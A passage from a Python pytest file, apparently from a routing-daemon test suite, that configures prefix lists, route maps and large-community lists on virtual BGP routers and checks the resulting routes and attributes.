from lib.topojson import build_config_from_json
pytestmark = [pytest.mark.bgpd, pytest.mark.staticd]
# Global variables
bgp_convergence = False
BGP_CONVERGENCE = False
NETWORK = {"ipv4": ["11.0.20.1/32", "11.0.20.2/32"], "ipv6": ["2::1/128", "2::2/128"]}
ADDR_TYPES = check_address_types()
def setup_module(mod):
"""setup_module.
Set up the pytest environment
* `mod`: module name
"""
testsuite_run_time = time.asctime(time.localtime(time.time()))
logger.info("Testsuite start time: {}".format(testsuite_run_time))
logger.info("=" * 40)
logger.info("Running setup_module to create topology")
# This function initiates the topology build with Topogen...
json_file = "{}/bgp_route_map_topo2.json".format(CWD)
tgen = Topogen(json_file, mod.__name__)
global topo
topo = tgen.json_topo
# ... and here it calls Mininet initialization functions.
# Start the topology: create tmp files which are loaded to routers
# to start daemons, and then start the routers
start_topology(tgen)
# Creating configuration from JSON
build_config_from_json(tgen, topo)
# Checking BGP convergence
global bgp_convergence
global ADDR_TYPES
# Don"t run this test if we have any failure.
if tgen.routers_have_failure():
pytest.skip(tgen.errors)
# API call to verify whether BGP has converged
bgp_convergence = verify_bgp_convergence(tgen, topo)
assert bgp_convergence is True, "setup_module: Failed \n Error: {}".format(
bgp_convergence
)
logger.info("Running setup_module() done")
def teardown_module(mod):
"""teardown_module.
Teardown the pytest environment.
* `mod`: module name
"""
logger.info("Running teardown_module to delete topology")
tgen = get_topogen()
# Stop topology and remove tmp files
tgen.stop_topology()
logger.info(
"Testsuite end time: {}".format(time.asctime(time.localtime(time.time())))
)
logger.info("=" * 40)
#####################################################
# Tests starting
#####################################################
def test_rmap_match_prefix_list_permit_in_and_outbound_prefixes_p0():
"""
TC: 57
Create route map to match prefix-list and permit inbound
and outbound prefixes and set criteria on match
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{
"seqid": 10,
"network": "any",
"action": "permit",
}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{
"seqid": 10,
"network": "any",
"action": "permit",
}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
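# A hedged sketch of the vtysh lines the prefix-list dict above is
# expected to render to (illustrative only; the exact CLI is generated
# by the create_prefix_lists helper):
#
#   ip prefix-list pf_list_1_ipv4 seq 10 permit any
#   ipv6 prefix-list pf_list_1_ipv6 seq 10 permit any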
for addr_type in ADDR_TYPES:
# Create route map
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {"prefix_lists": "pf_list_1_" + addr_type}
},
"set": {"locPrf": 150, "weight": 100},
},
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {"prefix_lists": "pf_list_1_" + addr_type}
},
"set": {"metric": 50},
},
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
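# Hedged sketch of the equivalent route-map config for the ipv4
# iteration (illustrative; create_route_maps owns the real rendering):
#
#   route-map rmap_match_pf_1_ipv4 permit 5
#    match ip address prefix-list pf_list_1_ipv4
#    set local-preference 150
#    set weight 100
#   route-map rmap_match_pf_2_ipv4 permit 5
#    match ip address prefix-list pf_list_1_ipv4
#    set metric 50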
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv4",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
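# The per-neighbor attachment above corresponds roughly to the
# following vtysh lines (illustrative sketch; <asn> and the peer
# addresses are placeholders resolved from the topology JSON):
#
#   router bgp <asn>
#    address-family ipv4 unicast
#     neighbor <r1-addr> route-map rmap_match_pf_1_ipv4 in
#     neighbor <r4-addr> route-map rmap_match_pf_2_ipv4 out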
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
# dual stack changes
for addr_type in ADDR_TYPES:
result4 = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result4 is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result4
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
# dual stack changes
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result4 = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result4 is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result4
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
# dual stack changes
for addr_type in ADDR_TYPES:
result4 = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result4 is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result4
)
# Verifying BGP set attributes
dut = "r4"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
# dual stack changes
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_modify_set_match_clauses_in_rmap_p0():
"""
TC_52:
Test modify set/match clauses in a route-map to see
if it takes immediate effect.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{
"seqid": 10,
"network": "any",
"action": "permit",
}
],
"pf_list_2_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
],
},
"ipv6": {
"pf_list_1_ipv6": [
{
"seqid": 10,
"network": "any",
"action": "permit",
}
],
"pf_list_2_ipv6": [
{"seqid": 10, "network": "any", "action": "permit"}
],
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {
"locPrf": 150,
},
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 50},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv4",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
# dual stack changes
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result4 = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result4 is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result4
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
# dual stack changes
for addr_type in ADDR_TYPES:
result4 = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result4 is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result4
)
# Verifying BGP set attributes
dut = "r4"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Modify set/match clause of in-used route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {
"locPrf": 1000,
},
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 2000},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r4"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_delete_route_maps_p1():
"""
TC_61:
Delete the route maps.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_tag_1_{}".format(addr_type): [
{"action": "deny", "match": {addr_type: {"tag": "4001"}}}
]
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Delete route maps
for addr_type in ADDR_TYPES:
input_dict = {"r3": {"route_maps": ["rmap_match_tag_1_{}".format(addr_type)]}}
result = delete_route_maps(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
result = verify_route_maps(tgen, input_dict)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
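# Deleting a route-map via delete_route_maps is expected to issue,
# roughly (illustrative sketch):
#
#   no route-map rmap_match_tag_1_ipv4
#   no route-map rmap_match_tag_1_ipv6
#
# after which verify_route_maps confirms the maps are gone from the
# running configuration.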
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_modify_prefix_list_referenced_by_rmap_p0():
"""
TC_50_1:
Test modify/remove prefix-lists referenced by a
route-map for match statement.
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{
"seqid": 10,
"network": "any",
"action": "permit",
}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{
"seqid": 100,
"network": "any",
"action": "permit",
}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"locPrf": 150, "weight": 100},
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 50},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv4",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r4"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Modify ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "deny"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "deny"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
sleep(5)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nRoutes are still present \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nRoutes are still present \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_remove_prefix_list_referenced_by_rmap_p0():
"""
TC_50_2:
Remove prefix-list referenced by route-map match clause
and verify it reflects as intended
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
"route_maps": {
"rmap_match_pf_1_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {
"locPrf": 150,
},
}
],
"rmap_match_pf_2_{}".format(addr_type): [
{
"action": "permit",
"seq_id": "5",
"match": {
addr_type: {
"prefix_lists": "pf_list_1_{}".format(addr_type)
}
},
"set": {"metric": 50},
}
],
}
}
}
result = create_route_maps(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
for addr_type in ADDR_TYPES:
input_dict_4 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv4",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv4",
"direction": "out",
}
]
}
}
},
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_1_ipv6",
"direction": "in",
}
]
}
}
},
"r4": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rmap_match_pf_2_ipv6",
"direction": "out",
}
]
}
}
},
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_4)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r3"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_1_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verifying BGP set attributes
dut = "r4"
routes = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
for addr_type in ADDR_TYPES:
rmap_name = "rmap_match_pf_2_{}".format(addr_type)
result = verify_bgp_attributes(
tgen, addr_type, dut, routes[addr_type], rmap_name, input_dict_3
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Remove/Delete prefix list
input_dict_3 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{
"seqid": 10,
"network": "any",
"action": "permit",
"delete": True,
}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{
"seqid": 100,
"network": "any",
"action": "permit",
"delete": True,
}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
result = verify_prefix_lists(tgen, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
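# The "delete": True flag should translate into removal of the
# entries, roughly (illustrative; the exact negation form is handled
# by create_prefix_lists):
#
#   no ip prefix-list pf_list_1_ipv4 seq 10 permit any
#   no ipv6 prefix-list pf_list_1_ipv6 seq 100 permit any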
# API call to clear BGP, so config changes are reflected
dut = "r3"
result = clear_bgp_and_verify(tgen, topo, dut)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nRoutes are still present \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
# Verifying RIB routes
dut = "r4"
protocol = "bgp"
for addr_type in ADDR_TYPES:
result = verify_rib(
tgen, addr_type, dut, input_dict, protocol=protocol, expected=False
)
assert (
result is not True
), "Testcase {} : Failed \nRoutes are still present \n Error: {}".format(
tc_name, result
)
logger.info("Expected behaviour: {}".format(result))
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_add_and_remove_community_list_referenced_by_rmap_p0():
"""
TC_51:
Add and remove community-list referenced by route-map match clause
and verify it reflects as intended
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# Creating configuration from JSON
# build_config_from_json(tgen, topo)
# Create route map
for addr_type in ADDR_TYPES:
input_dict_5 = {
"r1": {
"route_maps": {
"rm_r1_out_{}".format(addr_type): [
{
"action": "permit",
"set": {
"large_community": {"num": "1:1:1 1:2:3 2:1:1 2:2:2"}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_5)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
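# Hedged sketch of the resulting route-map on r1 (illustrative; <seq>
# is a placeholder, since no seq_id is given and the helper assigns one):
#
#   route-map rm_r1_out_ipv4 permit <seq>
#    set large-community 1:1:1 1:2:3 2:1:1 2:2:2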
# Configure neighbor for route map
input_dict_6 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rm_r1_out_ipv4",
"direction": "out",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r3": {
"dest_link": {
"r1": {
"route_maps": [
{
"name": "rm_r1_out_ipv6",
"direction": "out",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_6)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
for addr_type in ADDR_TYPES:
# Create standard large community-list
input_dict_1 = {
"r3": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "rmap_lcomm_{}".format(addr_type),
"value": "1:1:1 1:2:3 2:1:1 2:2:2",
"large": True,
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verify BGP large community is created
result = verify_create_community_list(tgen, input_dict_1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
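# A standard large community-list like the one above maps roughly to
# (illustrative sketch, assuming FRR bgpd syntax):
#
#   bgp large-community-list standard rmap_lcomm_ipv4 permit 1:1:1 1:2:3 2:1:1 2:2:2
#
# and the matching route-map clause created next should render as
# something like "match large-community rmap_lcomm_ipv4".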
for addr_type in ADDR_TYPES:
# Create route map
input_dict_2 = {
"r3": {
"route_maps": {
"rm_r3_in_{}".format(addr_type): [
{
"action": "permit",
"match": {
addr_type: {
"large-community-list": {
"id": "rmap_lcomm_" + addr_type
}
}
},
}
]
}
}
}
result = create_route_maps(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Configure neighbor for route map
input_dict_3 = {
"r3": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rm_r3_in_ipv4",
"direction": "in",
}
]
}
}
}
}
}
},
"ipv6": {
"unicast": {
"neighbor": {
"r1": {
"dest_link": {
"r3": {
"route_maps": [
{
"name": "rm_r3_in_ipv6",
"direction": "in",
}
]
}
}
}
}
}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_3)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
sleep(5)
# Verifying RIB routes
dut = "r3"
protocol = "bgp"
input_dict = topo["routers"]
for addr_type in ADDR_TYPES:
result = verify_rib(tgen, addr_type, dut, input_dict, protocol=protocol)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
# Verify large-community-list
dut = "r3"
networks = {
"ipv4": ["10.0.20.1/32", "10.0.20.2/32"],
"ipv6": ["1::1/128", "1::2/128"],
}
input_dict_4 = {"largeCommunity": "1:1:1 1:2:3 2:1:1 2:2:2"}
for addr_type in ADDR_TYPES:
result = verify_bgp_community(
tgen, addr_type, dut, networks[addr_type], input_dict_4
)
assert result is True, "Testcase {} : Failed \n Error: {}".format(
tc_name, result
)
write_test_footer(tc_name)
# Uncomment next line for debugging
# tgen.mininet_cli()
def test_multiple_match_statement_in_route_map_logical_ORed_p0():
"""
TC_45:
Test multiple match statements as part of a route-map's single
sequence number. (Logical OR of multiple match statements)
"""
tgen = get_topogen()
global bgp_convergence
if bgp_convergence is not True:
pytest.skip("skipped because of BGP Convergence failure")
# test case name
tc_name = inspect.stack()[0][3]
write_test_header(tc_name)
reset_config_on_routers(tgen)
# API call to advertise networks
input_dict_nw1 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {"advertise_networks": [{"network": "10.0.30.1/32"}]}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "1::1/128"}]}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_nw1)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# API call to advertise networks
input_dict_nw2 = {
"r1": {
"bgp": {
"address_family": {
"ipv4": {
"unicast": {"advertise_networks": [{"network": "20.0.30.1/32"}]}
},
"ipv6": {
"unicast": {"advertise_networks": [{"network": "2::1/128"}]}
},
}
}
}
}
result = create_router_bgp(tgen, topo, input_dict_nw2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_1_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_1_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
# Create ip prefix list
input_dict_2 = {
"r3": {
"prefix_lists": {
"ipv4": {
"pf_list_2_ipv4": [
{"seqid": 10, "network": "any", "action": "permit"}
]
},
"ipv6": {
"pf_list_2_ipv6": [
{"seqid": 100, "network": "any", "action": "permit"}
]
},
}
}
}
result = create_prefix_lists(tgen, input_dict_2)
assert result is True, "Testcase {} : Failed \n Error: {}".format(tc_name, result)
input_dict_3_addr_type = {}
# Create route map
for addr_type in ADDR_TYPES:
input_dict_3 = {
"r3": {
